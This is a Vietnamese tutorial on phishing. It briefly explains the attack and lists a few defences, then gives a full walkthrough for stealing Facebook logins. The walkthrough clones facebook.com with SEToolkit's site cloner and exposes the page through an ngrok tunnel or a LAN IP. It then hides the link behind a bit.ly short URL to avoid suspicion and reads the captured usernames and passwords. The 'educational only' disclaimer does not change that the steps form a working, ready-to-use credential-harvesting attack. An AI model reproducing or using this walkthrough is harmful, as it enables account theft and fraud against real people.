Phishing - Đánh Cắp Thông Tin Như Thế Nào?

Phishing - Đánh Cắp Thông Tin Như Thế Nào?

Các cuộc tấn công Phishing là một trong những thách thức an ninh phổ biến nhất mà cả cá nhân và các tổ chức, doanh nghiệp phải đối mặt trong việc đảm bảo an toàn thông tin của họ. Mình sẽ trình bày một số điều cơ bản về phương pháp Phishing đồng thời thực hiện tấn công Phishing để đánh cắp thông tin. 

Lưu ý: Bài viết mang tính giáo dục các bạn chỉ nên thử nghiệm để biết và phòng tránh. Nếu bạn thực hiện hành vi lừa đảo đánh cắp thông tin người khác thì có thể bị công an tóm vì đây là hành vi phạm pháp.

Bạn đã biết gì về Phishing?

1. Phishing là...

Phishing là một phương thức lừa đảo nhằm giả mạo các tổ chức có uy tín như ngân hàng, trang web giao dịch trực tuyến và các công ty thẻ tín dụng để lừa người dùng chia sẻ thông tin  tài chính như: tên đăng nhập, mật khẩu giao dịch, những thông tin nhạy cảm khác của họ. Phương thức tấn công này còn có thể cài phần mềm độc hại vào thiết bị của người dùng.

2. Phishing tấn công theo phương thức nào?

Hacker sẽ tìm hiểu về mục tiêu sau đó giả mạo người quen gửi một liên kết chuyển hướng tới một trang web không an toàn và yêu cầu bạn cung cấp những thông tin nhạy cảm, hay đặt một Trojan (mã độc) thông qua một tập tin đính kèm trong email. Từ đó, hacker có thể khai thác lỗ hổng và có được thông tin nhạy cảm. Không chỉ riêng email, hacker còn gửi cả những đường dẫn giả bằng tin nhắn, comment.

Ví dụ: Khi có người rò rỉ clip nhảy cảm hacker sẽ lợi dụng bản tính hiếu kì để phát tán một liên kết chuyển hướng có chứa mã độc....

Hay hacker sẽ tạo một website giả mạo sau đó tìm cách lừa mục tiêu đăng nhập thông tin cá nhân.

Ví dụ: Giả mạo website của ngân hàng, facebook... 

3 Giải pháp chống Phishing

Để tránh bị hacker sử dụng tấn công Phishing để lừa đảo trên Internet, thu thập dữ liệu cá nhân bạn cần lưu ý:

  • Hãy cẩn thận và không nên trả lời bất kỳ thư rác nào yêu cầu bạn xác nhận hoặc cập nhật bất kỳ thông tin nào về tài khoản của bạn. Thậm chí có vẻ như được cung cấp bởi một tổ chức uy tín hoặc đó là yêu cầu hoàn lại tiền cho bạn.
  • Xem kỹ địa chỉ của website trước khi thực hiện đăng nhập.
  • Không nhấp bất kỳ liên kết đi kèm với thư rác hay những liên kết từ tin nhắn người lạ, comment, nếu bạn không chắc chắn về nó.
  • Không bao giờ gửi thông tin bí mật của bạn về tài khoản của bạn trong email
  • Để giảm thiểu rủi ro bởi những vụ lừa đảo phishing này bạn nên sử dụng tường lửa, phần mềm chống gián điệp và phần mềm chống virus. Và phải đảm bảo cập nhật phần mềm này thường xuyên để bảo mật máy tính của bạn.

Demo cách tấn công bằng phương pháp Phishing.

Dưới đây mình sẽ tạo một giao diện facebook giả để đánh cắp pass, username. Bạn cần chuẩn bị:

  • Các bạn cần có sẵn một bản distro của linux nhé ở đây mình sẽ hướng dẫn bằng kali linux
  • Ngrok: Ngrok là một reverse proxy giúp người dùng internet bên ngoài mạng của bạn có thể truy cập vào localhost của bạn. Vì nó đứng giữa kết nối, nên nó có thể ghi lại các thông số và hỗ trợ bạn nhiều chức năng can thiệp khác như phân tích, log, repeate request…
  • SEtoolkit: SEtoolkit sẽ dùng để lưu trữ các trang lừa đảo cục bộ của bạn bằng cách sử dụng Apache & php. Nếu bạn không muốn làm những thứ phức tạp thì bạn sẽ thử công cụ tự động tuyệt vời này được gọi là SocialPhish.

Trường hợp tấn công ngoài mạng Lan.

Bước 1. Tải và cài đặt Ngrok

Các bạn truy cập và tải Ngrok tại đường link https://ngrok.com/download

Tùy vào từng Hệ điều hành thì có những file thực thi khác nhau. Ở đây mình dùng Kali Linux 64bit nên mình sẽ chọn Download for Linux .

Bước 2. Giải nén File

Sau khi tải về sẽ được File tên là ngrok-stable-linux-amd64.zip. Hãy giải nén nó ra.

Tiếp theo ta được file ngrok. Hãy copy nó vào đường dẫn này nhé: /usr/bin.

Bước 3. Thực hiện tấn công

Các bạn mở terminal gõ: cd Downloads.

Ta sẽ mở một Tunnel vào cổng 80 để chạy SEtoolkit: ./ngrok http 80

Sau khi thực hiện hãy copy đường dẫn mà ngrok tạo ra.

Tiếp tục đến SEtoolkit nữa là xong, cái này tích hợp sẵn trên Kali Linux rồi nhé nên khỏi phải cài đặt gì hết. Các bạn mở tiếp một Tab Terminal nữa rồi gõ lệnh sau: sudo setoolkit

Nhập mật khẩu của bạn vào để cấp quyền root

Chọn 1) Social – Engineering Attacks. Lệnh: set>1

Chọn tiếp 2) Website Attack Vectors. Lệnh: set>2

Chọn tiếp 3) Credential Browser Exploit Method. Lệnh: set>3

Tiếp tục chọn 2) Site Cloner. Lệnh: set:webattack>2

Sau đó các bạn nhập đường dẫn ngrok tạo ra vào: set:webattack> IP address...

Tiếp theo các bạn nhập đường link website mà mình muốn giả mạo vào set:webattack>Enter the url to clone:

Ở đây mình sẽ sẽ nhập là: https://www.facebook.com.

Bây giờ các bạn vào các trang rút gọn link như bit.ly chẳng hạn:

Mục đích của công việc này là tạo ra đường link đẹp để khỏi bị nghi ngờ bạn chỉ cần nhập đường link trên ngrok vào và nhấn Shorten sau đó sẽ hiện ra một đường link khác nhìn đẹp hơn.

Bước 4: Đây là bước quan trọng nhất mà không phải ai cũng làm được. Bạn phải bạn đem cái link đó đi để tiếp cận với Victic. Làm sao để họ đăng nhập vào các web giả mạo đó.

Nếu thành công thì bạn quay lại Terminal SEtoolkit lúc nãy để xem. Nhớ không được tắt Tab nào đi. Mỗi link chỉ tồn tại trong vòng 7 tiếng. Sau 7 tiếng link sẽ chết hoặc bạn đóng hết Terminal đi nó cũng sẽ tắt.
Sau khi victic đăng nhập vào thì sẽ hiện pass, username như trên hình.



Trường hợp tấn công trong mạng Lan.

Ở trường hợp này các bạn sẽ không cần phải sử dụng tới ngrok.
Sau khi mở terminal bật seotoolkit như hướng dẫn thì mở một terminal khác nhập ifconfig để xem địa chỉ Ip của bạn sau đó dán nó vào set:webattack> IP address for the POST back in.... thay vì lấy địa chỉ của ngrok tạo ra và tiếp tục thực hiện các bước còn lại như tấn công ngoài Lan.


Tạm kết

Trên đây mình đã thực hiện giả mạo facebook đánh cắp thông tin bằng phương pháp Phishing, các trang web khác các đều có thể thực hiện như vậy. Các bạn vẫn lưu ý, đây chỉ để thực hành và phòng tránh, tuyệt đối không sử dụng vào mục đích xấu. Chúc các bạn thành công.